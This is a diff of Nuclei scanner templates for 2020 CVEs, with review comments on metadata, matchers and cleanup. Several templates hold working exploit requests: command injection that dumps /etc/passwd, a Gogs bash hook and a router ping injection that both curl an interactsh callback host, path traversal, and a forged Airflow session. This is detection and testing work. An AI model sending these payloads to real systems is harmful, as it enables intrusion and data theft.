a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index ed41bf8faf..4a2318f583 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -16,11 +16,13 @@ info: cvss-score: 4.7 cve-id: CVE-2020-15129 cwe-id: CWE-601 - cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* epss-score: 0.00519 - tags: cve,cve2020,traefik,redirect + cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: traefik + product: traefik + tags: cve,cve2020,traefik,redirect http: - method: GET @@ -32,11 +34,11 @@ http: matchers-condition: and matchers: - - type: status - status: - - 302 - - type: word part: body words: - "Found" + + - type: status + status: + - 302 diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 24a2031412..662423edcb 100644 
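Review bot: In the CVE-2020-15129 matcher hunk the check still proves only that a 302 with `Found` in the body came back — any redirect on that path passes — so the template cannot distinguish an attacker-controlled target from the application's normal redirect, and the reorder does not change that. Add a header matcher tied to the injected destination, e.g. `- type: word` / `part: header` / `words: - "Location: <host injected by the request>"`, keeping `matchers-condition: and`; the request path is outside this hunk, so take the host literal from it rather than guessing. Status `302` alone is also weaker than `location` checks used elsewhere in the repository for `redirect`-tagged templates.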
--- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -16,11 +16,13 @@ info: cvss-score: 10 cve-id: CVE-2020-15148 cwe-id: CWE-502 + epss-score: 0.01814 cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:* - epss-score: 0.01843 - tags: cve,cve2020,rce,yii metadata: max-request: 1 + vendor: yiiframework + product: yii + tags: cve,cve2020,rce,yii http: - method: GET diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index be0b9cf1d2..a07bef6112 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -7,18 +7,22 @@ info: description: Nette Framework versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, and 3.0.6 are vulnerable to a code injection attack via specially formed parameters being passed to a URL. Nette is a PHP/Composer MVC Framework. reference: - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 - - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 + - https://lists.debian.org/debian-lts-announce/2021/04/msg00003.html + - https://packagist.org/packages/nette/application classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-15227 - cwe-id: CWE-74 - epss-score: 0.97403 - tags: cve,cve2020,nette,rce + cwe-id: CWE-94,CWE-74 + epss-score: 0.9741 + cpe: cpe:2.3:a:nette:application:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nette + product: application + tags: cve,cve2020,nette,rce http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" 
diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index 798646ffdb..c719b21439 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-15500 cwe-id: CWE-79 - cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* epss-score: 0.0021 - tags: cve,cve2020,xss,tileserver,packetstorm + cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tileserver + product: tileservergl + tags: cve,cve2020,xss,tileserver,packetstorm http: - method: GET @@ -27,16 +29,16 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: - "text/html" - type: word + part: body words: - "'>\"" - part: body + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-15505.yaml b/http/cves/2020/CVE-2020-15505.yaml index 7cb9853b89..2865bc404e 100644 --- a/http/cves/2020/CVE-2020-15505.yaml +++ b/http/cves/2020/CVE-2020-15505.yaml @@ -4,7 +4,6 @@ id: CVE-2020-15505 # To carry out further attacks, please see reference[2] below. # This template works by passing a Hessian header, otherwise; # it will return a 403 or 500 internal server error. Reference[3]. - info: name: MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution author: dwisiswant0 @@ -20,10 +19,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-15505 - epss-score: 0.97524 - tags: cve,cve2020,mobileiron,rce,sentry,kev + cwe-id: CWE-706 + epss-score: 0.97504 + cpe: cpe:2.3:a:mobileiron:core:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mobileiron + product: core + tags: cve,cve2020,mobileiron,rce,sentry,kev http: - raw: @@ -35,12 +38,14 @@ http: Connection: close {{hex_decode('630200480004')}} + matchers-condition: and matchers: - type: word + part: header words: - "application/x-hessian" - part: header + - type: status status: - 200 
diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml
index 42c8535887..80ca9dfcd9 100644
--- a/http/cves/2020/CVE-2020-15568.yaml
+++ b/http/cves/2020/CVE-2020-15568.yaml
@@ -14,11 +14,13 @@ info:
 cvss-score: 9.8
 cve-id: CVE-2020-15568
 cwe-id: CWE-913
+ epss-score: 0.96537
 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*
- epss-score: 0.96812
- tags: cve,cve2020,terramaster,rce
 metadata:
 max-request: 2
+ vendor: terra-master
+ product: tos
+ tags: cve,cve2020,terramaster,rce
 http:
 - raw:
@@ -26,7 +28,6 @@ http:
 GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1
 Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded
-
 - |
 GET /include/nuclei.txt HTTP/1.1
 Host: {{Hostname}}
@@ -35,9 +36,10 @@ http:
 matchers-condition: and
 matchers:
 - type: regex
+ part: body
 regex:
 - "root:.*:0:0:"
- part: body
+
 - type: status
 status:
 - 200
diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml
index 9ac52e2f26..1c0e2c2499 100644
--- a/http/cves/2020/CVE-2020-15867.yaml
+++ b/http/cves/2020/CVE-2020-15867.yaml
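Review bot: The rewritten `tags: cve,cve2020,terramaster,rce` still lacks `intrusive`, although the first raw request executes `(cat /etc/passwd)>nuclei.txt` on the target and the second fetches `/include/nuclei.txt` — the template drops a copy of `/etc/passwd` into the web root and nothing removes it, so it remains retrievable by anyone after the scan. This same commit adds `intrusive` to CVE-2020-15867 for a comparable footprint; do the same here: `tags: cve,cve2020,terramaster,rce,intrusive`. Consider a trailing request through the same `func=_exec` parameter to delete the file, or at least a full-line comment above the first request stating that `nuclei.txt` is left behind. The `Content-Type: application/x-www-form-urlencoded` header on a bodiless GET is also dead weight and could be dropped.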
@@ -15,48 +15,44 @@ info:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 7.2
 cve-id: CVE-2020-15867
+ epss-score: 0.96555
 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
- epss-score: 0.9663
 metadata:
 max-request: 7
 verified: true
- tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm
+ vendor: gogs
+ product: gogs
+ tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive
 http:
 - raw:
 - |
 GET /user/login HTTP/1.1
 Host: {{Hostname}}
-
 - |
 POST /user/login HTTP/1.1
 Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded
 _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
-
 - |
 GET /repo/create HTTP/1.1
 Host: {{Hostname}}
-
 - |
 POST /repo/create HTTP/1.1
 Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded
 _csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on
-
 - |
 POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1
 Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded
 _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}
-
 - |
 GET /{{username}}/{{randstr}}/_new/master HTTP/1.1
 Host: {{Hostname}}
-
 - |
 POST /{{username}}/{{randstr}}/_new/master HTTP/1.1
 Host: {{Hostname}}
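Review bot: Adding `intrusive` is correct, but nothing in the request chain deletes what it creates: `POST /repo/create` makes a private repository named `{{randstr}}` and the `settings/hooks/git/post-receive` request installs a `#!/bin/bash` hook that curls `{{interactsh-url}}`, so a callback to a third-party OAST host stays wired into the target's repository after the scan ends. At minimum document that above the hook request, e.g. `# installs a persistent post-receive hook; neither the repo nor the hook is removed afterwards`, and preferably add a final request that deletes the repository once the interaction has been observed. The `info` description that should carry the same warning sits above this hunk.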
@@ -65,36 +61,37 @@ http:
 _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
 cookie-reuse: true
+ matchers-condition: and
 matchers:
 - type: word
 part: interactsh_protocol
 words:
- - "http"
+ - http
 - type: word
 part: body_1
 words:
- - 'content="Gogs'
+ - content="Gogs
 extractors:
 - type: regex
 name: csrf
 group: 1
 regex:
- - 'name="_csrf" value="(.*)"'
+ - name="_csrf" value="(.*)"
 internal: true
 - type: regex
 name: auth_csrf
 group: 1
 regex:
- - 'name="_csrf" content="(.*)"'
+ - name="_csrf" content="(.*)"
 internal: true
 - type: regex
 name: last_commit
 group: 1
 regex:
- - 'name="last_commit" value="(.*)"'
+ - name="last_commit" value="(.*)"
 internal: true
diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml
index 79ff8fe424..c412810275 100644
--- a/http/cves/2020/CVE-2020-15895.yaml
+++ b/http/cves/2020/CVE-2020-15895.yaml
@@ -16,9 +16,12 @@ info:
 cve-id: CVE-2020-15895
 cwe-id: CWE-79
 epss-score: 0.00187
+ cpe: cpe:2.3:o:d-link:dir-816l_firmware:2.06:*:*:*:*:*:*:*
 metadata:
 max-request: 1
 shodan-query: html:"DIR-816L"
+ vendor: d-link
+ product: dir-816l_firmware
 tags: cve,cve2020,dlink,xss
 http:
diff --git a/http/cves/2020/CVE-2020-15920.yaml b/http/cves/2020/CVE-2020-15920.yaml
index c20b72b9b5..59abbb89ec 100644
--- a/http/cves/2020/CVE-2020-15920.yaml
+++ b/http/cves/2020/CVE-2020-15920.yaml
@@ -15,11 +15,13 @@ info:
 cvss-score: 9.8
 cve-id: CVE-2020-15920
 cwe-id: CWE-78
+ epss-score: 0.97241
 cpe: cpe:2.3:a:midasolutions:eframework:*:*:*:*:*:*:*:*
- epss-score: 0.97362
- tags: cve,cve2020,mida,rce,packetstorm
 metadata:
 max-request: 1
+ vendor: midasolutions
+ product: eframework
+ tags: cve,cve2020,mida,rce,packetstorm
 http:
 - method: POST
diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml
index 9390d4c200..8f3c8cfc12 100644
--- a/http/cves/2020/CVE-2020-16139.yaml
+++ b/http/cves/2020/CVE-2020-16139.yaml
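Review bot: Stripping the quotes from the three extractor regexes (`- name="_csrf" value="(.*)"`) and the `content="Gogs` word turns them into plain scalars; they parse today, but the neighbouring templates in this very commit keep such values quoted (`'root:.*:0:0:'`, `"text/html"`), and a later edit that introduces a leading `[`, `*`, `&` or a ` #` inside one of them will change meaning without any YAML error. Keep the single quotes on the regex and word entries, and since the lines are being touched anyway, `value="([^"]*)"` is the non-greedy form that stops at the closing quote instead of the last `"` on the line. Adding `matchers-condition: and` is the right call given the two matchers that follow.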
@@ -7,19 +7,20 @@ info: description: | Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. reference: - - https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/ - http://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html - - https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/ - https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html - https://nvd.nist.gov/vuln/detail/CVE-2020-16139 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2020-16139 - epss-score: 0.00835 - tags: cve,cve2020,dos,cisco,packetstorm + epss-score: 0.01181 + cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: unified_ip_conference_station_7937g_firmware + tags: cve,cve2020,dos,cisco,packetstorm http: - raw: @@ -29,13 +30,15 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: header words: - "application/xml" + - type: word words: - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index f70bba6c42..a3bc1a2c27 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml 
@@ -11,35 +11,41 @@ info: - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag - https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846 - https://nvd.nist.gov/vuln/detail/CVE-2020-16846 + - http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00029.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-16846 cwe-id: CWE-78 - epss-score: 0.97535 - tags: vulhub,cve,cve2020,saltstack,kev + epss-score: 0.97541 + cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: saltstack + product: salt + tags: vulhub,cve,cve2020,saltstack,kev http: - method: POST path: - "{{BaseURL}}/run" + body: "token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei" + headers: Content-Type: application/x-www-form-urlencoded # CherryPy will abort w/o define this header matchers-condition: and matchers: + - type: dsl + dsl: + - regex("CherryPy\/([0-9.]+)", header) || regex("CherryPy ([0-9.]+)", body) + - type: word part: body words: - "An unexpected error occurred" - - type: dsl - dsl: - - regex("CherryPy\/([0-9.]+)", header) || regex("CherryPy ([0-9.]+)", body) - - type: word part: header words: diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index c23fe6a4de..3d0e4fc201 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -15,10 +15,13 @@ info: cvss-score: 7.8 cve-id: CVE-2020-16952 cwe-id: CWE-346 - epss-score: 0.23324 - tags: msf,cve,cve2020,sharepoint,iis,microsoft,ssi,rce + epss-score: 0.16299 + cpe: cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: microsoft + product: sharepoint_enterprise_server + tags: msf,cve,cve2020,sharepoint,iis,microsoft,ssi,rce http: - method: GET diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index efd39d7980..563e80c21c 100644 --- a/http/cves/2020/CVE-2020-17362.yaml 
+++ b/http/cves/2020/CVE-2020-17362.yaml @@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-17362 cwe-id: CWE-79 - cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:*:*:* - epss-score: 0.00095 - tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020,unauth + epss-score: 0.00101 + cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: themeinprogress + product: nova_lite + tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020,unauth http: - method: GET @@ -28,14 +31,14 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word + part: body words: - "nova-lite" - part: body - type: word part: header diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 4657bb0f25..94bd06ecc1 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -14,10 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-17453 cwe-id: CWE-79 - epss-score: 0.02402 - tags: xss,wso2,cve2020,cve + epss-score: 0.01736 + cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wso2 + product: api_manager + tags: xss,wso2,cve2020,cve http: - method: GET @@ -26,16 +29,16 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - "'';alert('nuclei')//';" + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - - type: word - words: - - "'';alert('nuclei')//';" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index f1a453e524..7d0f42657b 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml 
@@ -9,16 +9,20 @@ info: - https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/ - https://nvd.nist.gov/vuln/detail/CVE-2020-17456 - http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/166273/Seowon-SLR-120-Router-Remote-Code-Execution.html + - https://www.exploit-db.com/exploits/50821 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-17456 cwe-id: CWE-78 - epss-score: 0.97283 - tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve + epss-score: 0.97265 + cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 - + vendor: seowonintech + product: slc-130_firmware + tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve variables: useragent: '{{rand_base(6)}}' @@ -40,6 +44,7 @@ http: Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index ef71ee803d..85f29f017d 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml 
@@ -10,16 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-17496 - https://seclists.org/fulldisclosure/2020/Aug/5 - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch + - https://cwe.mitre.org/data/definitions/78.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-17496 cwe-id: CWE-74 + epss-score: 0.97513 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* - epss-score: 0.97519 - tags: vbulletin,rce,kev,tenable,seclists,cve,cve2020 metadata: max-request: 1 + vendor: vbulletin + product: vbulletin + tags: vbulletin,rce,kev,tenable,seclists,cve,cve2020 http: - raw: diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index 4d3d0de91a..0fc619a4d1 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -14,11 +14,13 @@ info: cvss-score: 8.8 cve-id: CVE-2020-17505 cwe-id: CWE-78 - cpe: cpe:2.3:a:articatech:web_proxy:*:*:*:*:*:*:*:* - epss-score: 0.97122 - tags: proxy,packetstorm,cve,cve2020,rce,artica + epss-score: 0.96863 + cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: articatech + product: web_proxy + tags: proxy,packetstorm,cve,cve2020,rce,artica http: - raw: @@ -26,23 +28,23 @@ http: GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 Host: {{Hostname}} Accept: */* - - | GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1 Host: {{Hostname}} Accept: */* cookie-reuse: true + matchers-condition: and matchers: - type: word + part: body words: - "array(2)" - "Position: ||whoami||" - "root" condition: and - part: body - type: status status: - 200 diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index a485ca6b0c..67aa99a35b 100644 
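Review bot: In the CVE-2020-17496 hunk the added reference `https://cwe.mitre.org/data/definitions/78.html` is a generic CWE definition rather than an advisory, and it names OS command injection (CWE-78) while the classification a few lines below keeps `cwe-id: CWE-74`, so the template now carries contradictory weakness data. Either drop the link (seclists and the vBulletin forum post already cover the advisory) or change `cwe-id` to whatever the request body — outside this hunk — actually exercises, so the two agree. For the CVE-2020-17505 hunk further down, adding `matchers-condition: and` closes a real gap (nuclei defaults to `or`, so status 200 alone used to match) and needs no change.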
--- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -14,11 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17506 cwe-id: CWE-89 - cpe: cpe:2.3:a:articatech:web_proxy:*:*:*:*:*:*:*:* - epss-score: 0.96704 - tags: cve,cve2020,artica,proxy,packetstorm + epss-score: 0.96186 + cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: articatech + product: web_proxy + tags: cve,cve2020,artica,proxy,packetstorm http: - method: GET @@ -27,12 +29,18 @@ http: host-redirects: true max-redirects: 1 + matchers-condition: and matchers: - type: word words: - "artica-applianc" + - type: word + part: header + words: + - "PHPSESSID" + - type: status status: - 200 @@ -40,11 +48,6 @@ http: - 302 condition: or - - type: word - part: header - words: - - "PHPSESSID" - extractors: - type: kval kval: diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml index 36d01f797a..1e802257f5 100644 --- a/http/cves/2020/CVE-2020-17518.yaml +++ b/http/cves/2020/CVE-2020-17518.yaml @@ -16,13 +16,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2020-17518 - cwe-id: CWE-22 + cwe-id: CWE-22,CWE-23 + epss-score: 0.97469 cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* - epss-score: 0.97462 - tags: lfi,flink,fileupload,vulhub,cve,cve2020,apache,intrusive metadata: max-request: 2 - + vendor: apache + product: flink + tags: lfi,flink,fileupload,vulhub,cve,cve2020,apache,intrusive http: - raw: @@ -37,11 +38,10 @@ http: {{randstr}} ------WebKitFormBoundaryoZ8meKnrrso89R6Y-- - - | GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1 matchers: - type: dsl dsl: - - 'contains(body_2, "{{randstr}}") && status_code == 200' # Using CVE-2020-17519 to confirm this. + - 'contains(body_2, "{{randstr}}") && status_code == 200' 
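Review bot: In the CVE-2020-17518 hunk the comment `# Using CVE-2020-17519 to confirm this.` was dropped from the DSL matcher, and it was the only place that explained why a 17518 (upload) template issues a second request through the `/jobmanager/logs/..%252f...%252ftmp%252fpoc` traversal path — that read primitive is a different CVE, and a reader will now assume the traversal belongs to this one. Restore it as a full-line comment above the second raw request, e.g. `# the upload only proves the write; the log-path traversal (CVE-2020-17519) reads /tmp/poc back to confirm it`, which is also sturdier than a trailing comment after a quoted DSL expression. The file dropped at `/tmp/poc` persists on the target; the `intrusive` tag already covers that, but the new comment is a good place to say so.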
diff --git a/http/cves/2020/CVE-2020-17519.yaml b/http/cves/2020/CVE-2020-17519.yaml index b8661c6b98..1fd45c10fb 100644 --- a/http/cves/2020/CVE-2020-17519.yaml +++ b/http/cves/2020/CVE-2020-17519.yaml @@ -16,22 +16,26 @@ info: cvss-score: 7.5 cve-id: CVE-2020-17519 cwe-id: CWE-552 + epss-score: 0.97434 cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* - epss-score: 0.97486 - tags: cve,cve2020,apache,lfi,flink metadata: max-request: 1 + vendor: apache + product: flink + tags: cve,cve2020,apache,lfi,flink http: - method: GET path: - "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd" + matchers-condition: and matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status status: - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index 1732bb95ca..83271c2100 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -11,18 +11,21 @@ info: - https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E - http://www.openwall.com/lists/oss-security/2020/12/21/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-17526 + - https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E remediation: Change default value for [webserver] secret_key config. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2020-17526 cwe-id: CWE-287 + epss-score: 0.03799 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* - epss-score: 0.02043 metadata: max-request: 2 fofa-query: Apache Airflow verified: true + vendor: apache + product: airflow tags: cve,cve2020,apache,airflow,auth-bypass http: 
@@ -30,15 +33,21 @@ http: - | GET /admin/ HTTP/1.1 Host: {{Hostname}} - - | GET /admin/ HTTP/1.1 Host: {{Hostname}} Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY req-condition: true + matchers-condition: and matchers: + - type: dsl + dsl: + - "contains(body_1, 'Redirecting...')" + - "status_code_1 == 302" + condition: and + - type: word part: body_2 words: @@ -48,9 +57,3 @@ http: - "SLA Misses" - "Task Instances" condition: and - - - type: dsl - dsl: - - "contains(body_1, 'Redirecting...')" - - "status_code_1 == 302" - condition: and diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index 92ab1541f4..537683e9c5 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -16,10 +16,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17530 cwe-id: CWE-917 - epss-score: 0.96825 - tags: cve,cve2020,apache,rce,struts,kev,packetstorm + epss-score: 0.971 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve,cve2020,apache,rce,struts,kev,packetstorm http: - method: GET @@ -29,6 +32,6 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index 605a6aa756..d1d10e58fb 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-18268 cwe-id: 